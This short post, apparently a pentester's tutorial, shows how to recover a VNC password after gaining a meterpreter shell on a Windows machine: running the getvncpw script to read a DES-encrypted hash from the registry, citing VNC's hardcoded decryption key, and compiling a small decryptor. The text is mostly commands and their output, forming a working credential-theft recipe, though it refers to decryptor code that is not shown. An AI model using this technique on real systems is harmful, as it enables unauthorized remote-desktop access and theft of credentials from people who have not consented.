inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
change the relevant section
/* put your password hash here in p */
getvncpw spit out: 3290e903b5bf3769
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
or use this one
where you can just put your hash on the command line and don't have to recompile every time.